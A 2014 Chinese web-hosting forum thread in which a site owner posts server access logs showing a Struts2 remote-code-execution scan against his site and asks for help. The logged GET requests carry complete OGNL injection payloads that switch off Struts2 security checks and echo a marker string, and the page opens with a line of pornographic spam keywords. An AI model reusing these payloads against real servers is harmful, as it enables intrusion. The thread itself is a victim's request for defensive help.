中国真实偷乱视频,东京道一本热中文字幕,久久精品国产99国产精品亚洲,欧美激情一区二区三区在线

標題: [求助] 我的站被struts2遠程代碼執(zhí)行漏洞簡要回顧 [打印本頁]

作者: flymeteor 時間: 2014-9-24 10:00 標題: 我的站被struts2遠程代碼執(zhí)行漏洞簡要回顧

我的站被這個搞了，截取一段日志，不是很懂，老大來看看，是 [tr][/tr]

當前版本: wdcp_v2.5.10(20140213) 最新
wdcp_v2.5.10(20140213)
更新日志

220.181.165.11 - - [23/Sep/2014:08:00:37 +0800] "GET /news/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 18573
220.181.165.11 - - [23/Sep/2014:08:00:38 +0800] "GET /news/t_mishouhuan/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 9085
220.181.165.132 - - [23/Sep/2014:08:00:38 +0800] "GET /news/t_shengdian/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 9094
220.181.165.134 - - [23/Sep/2014:08:00:38 +0800] "POST /news/ HTTP/1.1" 200 18573
220.181.165.4 - - [23/Sep/2014:08:00:38 +0800] "GET /news/t_ram/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 7861
222.85.129.139 - - [23/Sep/2014:08:00:38 +0800] "GET /shuaji/77925.html HTTP/1.1" 200 5816
223.104.13.16 - - [23/Sep/2014:08:00:36 +0800] "GET /uploads/image/20130916/20130916074137_94932.jpg HTTP/1.1" 200 53333
220.181.165.11 - - [23/Sep/2014:08:00:38 +0800] "POST /news/t_mishouhuan/ HTTP/1.1" 200 9085
220.181.165.135 - - [23/Sep/2014:08:00:38 +0800] "GET /new/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 301 841
220.181.165.9 - - [23/Sep/2014:08:00:38 +0800] "GET /softs/bixu/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 9080
220.181.165.8 - - [23/Sep/2014:08:00:38 +0800] "POST /news/t_ram/ HTTP/1.1" 200 7861
218.81.235.186 - - [23/Sep/2014:08:00:38 +0800] "GET /js/grey.png HTTP/1.1" 200 3410

作者: yangjiangh 時間: 2014-9-24 18:44

我也不清楚不知道有沒有交流論壇呢？

歡迎光臨 WDlinux官方論壇 (http://ahbydz.com/bbs/)